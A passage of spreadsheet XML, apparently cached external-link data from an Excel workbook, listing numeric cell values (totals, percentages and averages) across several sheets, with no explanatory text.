          <cell r="Y50">
            <v>1428.666</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1313.91</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>96</v>
          </cell>
          <cell r="S101">
            <v>5279.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.0803624260355</v>
          </cell>
          <cell r="W101">
            <v>272.458333333333</v>
          </cell>
          <cell r="X101">
            <v>273.260416666667</v>
          </cell>
          <cell r="Y101">
            <v>260.179201143178</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>35.0739521696253</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>96</v>
          </cell>
          <cell r="S104">
            <v>5256.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>64.7935157790927</v>
          </cell>
          <cell r="W104">
            <v>28.628230616304</v>
          </cell>
          <cell r="X104">
            <v>28.5442000533675</v>
          </cell>
          <cell r="Y104">
            <v>25.9931820253395</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.5683185404339</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>42.66</v>
          </cell>
          <cell r="S107">
            <v>2528.09</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>44.4375</v>
          </cell>
          <cell r="V107">
            <v>31.1648175542406</v>
          </cell>
          <cell r="W107">
            <v>115.6382079459</v>
          </cell>
          <cell r="X107">
            <v>122.573839662447</v>
          </cell>
          <cell r="Y107">
            <v>131.773394143405</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.67</v>
          </cell>
          <cell r="R108">
            <v>44.67</v>
          </cell>
          <cell r="S108">
            <v>2241.52</v>
          </cell>
          <cell r="T108">
            <v>48.625</v>
          </cell>
          <cell r="U108">
            <v>46.53125</v>
          </cell>
          <cell r="V108">
            <v>27.6321499013806</v>
          </cell>
          <cell r="W108">
            <v>126.649528706084</v>
          </cell>
          <cell r="X108">
            <v>127.535258562794</v>
          </cell>
          <cell r="Y108">
            <v>127.426478461044</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.5</v>
          </cell>
          <cell r="R109">
            <v>45.67</v>
          </cell>
          <cell r="S109">
            <v>2841.26</v>
          </cell>
          <cell r="T109">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U109">
            <v>47.5729166666667</v>
          </cell>
          <cell r="V109">
            <v>35.0253944773175</v>
          </cell>
          <cell r="W109">
            <v>274.173913043478</v>
          </cell>
          <cell r="X109">
            <v>275.147799430698</v>
          </cell>
          <cell r="Y109">
            <v>271.37467180054</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>0.67</v>
          </cell>
          <cell r="R110">
            <v>0.67</v>
          </cell>
          <cell r="S110">
            <v>2764.73</v>
          </cell>
          <cell r="T110">
            <v>2.79166666666667</v>
          </cell>
          <cell r="U110">
            <v>0.697916666666667</v>
          </cell>
          <cell r="V110">
            <v>34.0819773175542</v>
          </cell>
          <cell r="W110">
            <v>364.179104477612</v>
          </cell>
          <cell r="X110">
            <v>364.179104477612</v>
          </cell>
          <cell r="Y110">
            <v>268.873994928981</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>579.6</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>823</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>8872.451</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6580</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>10862.99</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>187949.422</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>12386</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8085.64</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>79836.61</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>196.46</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>15093</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>11970</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4874.58</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>46790.78</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1340.32</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>13266.81</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>416</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1674.28</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>4686.02</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>231.62</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>549</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1111.286</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1537.99</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>120</v>
          </cell>
          <cell r="S101">
            <v>5303.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.1833702064897</v>
          </cell>
          <cell r="W101">
            <v>274.166666666667</v>
          </cell>
          <cell r="X101">
            <v>273.441666666667</v>
          </cell>
          <cell r="Y101">
            <v>260.242500969676</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.9704891838741</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>120</v>
          </cell>
          <cell r="S104">
            <v>5280.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>64.8973697148476</v>
          </cell>
          <cell r="W104">
            <v>27.4772036474146</v>
          </cell>
          <cell r="X104">
            <v>28.3302349678474</v>
          </cell>
          <cell r="Y104">
            <v>26.0002685138484</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.4663470993117</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>54.49</v>
          </cell>
          <cell r="S107">
            <v>2539.92</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>45.4083333333333</v>
          </cell>
          <cell r="V107">
            <v>31.2182890855457</v>
          </cell>
          <cell r="W107">
            <v>121.470836855452</v>
          </cell>
          <cell r="X107">
            <v>122.334373279501</v>
          </cell>
          <cell r="Y107">
            <v>131.725408674289</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>56.5</v>
          </cell>
          <cell r="S108">
            <v>2253.35</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.0833333333333</v>
          </cell>
          <cell r="V108">
            <v>27.6960422812192</v>
          </cell>
          <cell r="W108">
            <v>120.710059171598</v>
          </cell>
          <cell r="X108">
            <v>126.106194690265</v>
          </cell>
          <cell r="Y108">
            <v>127.391217520581</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>57.5</v>
          </cell>
          <cell r="S109">
            <v>2853.09</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>47.9166666666667</v>
          </cell>
          <cell r="V109">
            <v>35.0674778761061</v>
          </cell>
          <cell r="W109">
            <v>251.901944209637</v>
          </cell>
          <cell r="X109">
            <v>270.365217391304</v>
          </cell>
          <cell r="Y109">
            <v>271.29393044033</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>24</v>
          </cell>
          <cell r="R110">
            <v>24.67</v>
          </cell>
          <cell r="S110">
            <v>2788.73</v>
          </cell>
          <cell r="T110">
            <v>100</v>
          </cell>
          <cell r="U110">
            <v>20.5583333333333</v>
          </cell>
          <cell r="V110">
            <v>34.2764257620452</v>
          </cell>
          <cell r="W110">
            <v>272.541666666667</v>
          </cell>
          <cell r="X110">
            <v>275.030401297122</v>
          </cell>
          <cell r="Y110">
            <v>268.905559161339</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>873.68</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>820</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>8926.131</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6545</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>7165.67</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>187328.752</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>7845</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7530.64</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>80150.97</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>202.76</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>14890.24</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4312</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4714.94</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>46387.84</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>527</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1256</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12537.81</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>3006</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1356.94</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>6335.08</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>317.78</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>341</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1088.066</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1422.67</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>144</v>
          </cell>
          <cell r="S101">
            <v>5327.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.2857720588235</v>
          </cell>
          <cell r="W101">
            <v>272.708333333333</v>
          </cell>
          <cell r="X101">
            <v>273.319444444444</v>
          </cell>
          <cell r="Y101">
            <v>260.298660545764</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.8676348039216</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>144</v>
          </cell>
          <cell r="S104">
            <v>5304.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>65.000612745098</v>
          </cell>
          <cell r="W104">
            <v>27.8686019862526</v>
          </cell>
          <cell r="X104">
            <v>28.2534681640327</v>
          </cell>
          <cell r="Y104">
            <v>26.0091007583965</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.3649754901961</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.33</v>
          </cell>
          <cell r="R107">
            <v>65.82</v>
          </cell>
          <cell r="S107">
            <v>2551.25</v>
          </cell>
          <cell r="T107">
            <v>47.2083333333333</v>
          </cell>
          <cell r="U107">
            <v>45.7083333333333</v>
          </cell>
          <cell r="V107">
            <v>31.2653186274509</v>
          </cell>
          <cell r="W107">
            <v>133.539276257723</v>
          </cell>
          <cell r="X107">
            <v>124.263141902157</v>
          </cell>
          <cell r="Y107">
            <v>131.733463988241</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.83</v>
          </cell>
          <cell r="R108">
            <v>68.33</v>
          </cell>
          <cell r="S108">
            <v>2265.18</v>
          </cell>
          <cell r="T108">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U108">
            <v>47.4513888888889</v>
          </cell>
          <cell r="V108">
            <v>27.7595588235294</v>
          </cell>
          <cell r="W108">
            <v>139.391377852916</v>
          </cell>
          <cell r="X108">
            <v>128.406263720181</v>
          </cell>
          <cell r="Y108">
            <v>127.453888874174</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>9.83</v>
          </cell>
          <cell r="R109">
            <v>67.33</v>
          </cell>
          <cell r="S109">
            <v>2862.92</v>
          </cell>
          <cell r="T109">
            <v>40.9583333333333</v>
          </cell>
          <cell r="U109">
            <v>46.7569444444444</v>
          </cell>
          <cell r="V109">
            <v>35.0848039215686</v>
          </cell>
          <cell r="W109">
            <v>269.888097660224</v>
          </cell>
          <cell r="X109">
            <v>270.295559186098</v>
          </cell>
          <cell r="Y109">
            <v>271.289103432859</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>7.33</v>
          </cell>
          <cell r="R110">
            <v>32</v>
          </cell>
          <cell r="S110">
            <v>2796.06</v>
          </cell>
          <cell r="T110">
            <v>30.5416666666667</v>
          </cell>
          <cell r="U110">
            <v>22.2222222222222</v>
          </cell>
          <cell r="V110">
            <v>34.2654411764705</v>
          </cell>
          <cell r="W110">
            <v>276.944065484311</v>
          </cell>
          <cell r="X110">
            <v>275.46875</v>
          </cell>
          <cell r="Y110">
            <v>268.926632475698</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="9">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>775.58</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>805</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>8896.711</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6423</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>6935.89</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>186815.862</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>7828</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7450.3</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>80528.67</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>114.3</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>14775.94</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3126</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4642.42</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>44871.42</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>3192</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1343.66</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14386.15</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>1510</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1349.92</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>6495.16</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>409.66</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>320</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1177.726</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1749.89</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>168</v>
          </cell>
          <cell r="S101">
            <v>5351.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>65.387573313783</v>
          </cell>
          <cell r="W101">
            <v>267.625</v>
          </cell>
          <cell r="X101">
            <v>272.505952380952</v>
          </cell>
          <cell r="Y101">
            <v>260.331518266805</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>34.7653836754643</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>168</v>
          </cell>
          <cell r="S104">
            <v>5328.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>65.1032502443793</v>
          </cell>
          <cell r="W104">
            <v>28.6470496652655</v>
          </cell>
          <cell r="X104">
            <v>28.3086870098949</v>
          </cell>
          <cell r="Y104">
            <v>26.0212822708374</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.2641984359726</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.33</v>
          </cell>
          <cell r="R107">
            <v>77.15</v>
          </cell>
          <cell r="S107">
            <v>2562.58</v>
          </cell>
          <cell r="T107">
            <v>47.2083333333333</v>
          </cell>
          <cell r="U107">
            <v>45.922619047619</v>
          </cell>
          <cell r="V107">
            <v>31.3120723362658</v>
          </cell>
          <cell r="W107">
            <v>133.274492497793</v>
          </cell>
          <cell r="X107">
            <v>125.586519766688</v>
          </cell>
          <cell r="Y107">
            <v>131.740277376707</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>10.33</v>
          </cell>
          <cell r="R108">
            <v>78.66</v>
          </cell>
          <cell r="S108">
            <v>2275.51</v>
          </cell>
          <cell r="T108">
            <v>43.0416666666667</v>
          </cell>
          <cell r="U108">
            <v>46.8214285714286</v>
          </cell>
          <cell r="V108">
            <v>27.8043743890518</v>
          </cell>
          <cell r="W108">
            <v>125.363020329138</v>
          </cell>
          <cell r="X108">
            <v>128.006610729723</v>
          </cell>
          <cell r="Y108">
            <v>127.444397080215</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>79.16</v>
          </cell>
          <cell r="S109">
            <v>2874.74999999999</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>47.1190476190476</v>
          </cell>
          <cell r="V109">
            <v>35.1264662756598</v>
          </cell>
          <cell r="W109">
            <v>269.822485207101</v>
          </cell>
          <cell r="X109">
            <v>270.22486104093</v>
          </cell>
          <cell r="Y109">
            <v>271.283068092878</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>7</v>
          </cell>
          <cell r="R110">
            <v>39</v>
          </cell>
          <cell r="S110">
            <v>2803.06</v>
          </cell>
          <cell r="T110">
            <v>29.1666666666667</v>
          </cell>
          <cell r="U110">
            <v>23.2142857142857</v>
          </cell>
          <cell r="V110">
            <v>34.2504887585532</v>
          </cell>
          <cell r="W110">
            <v>261.571428571429</v>
          </cell>
          <cell r="X110">
            <v>272.974358974359</v>
          </cell>
          <cell r="Y110">
            <v>268.908264539468</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="10">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
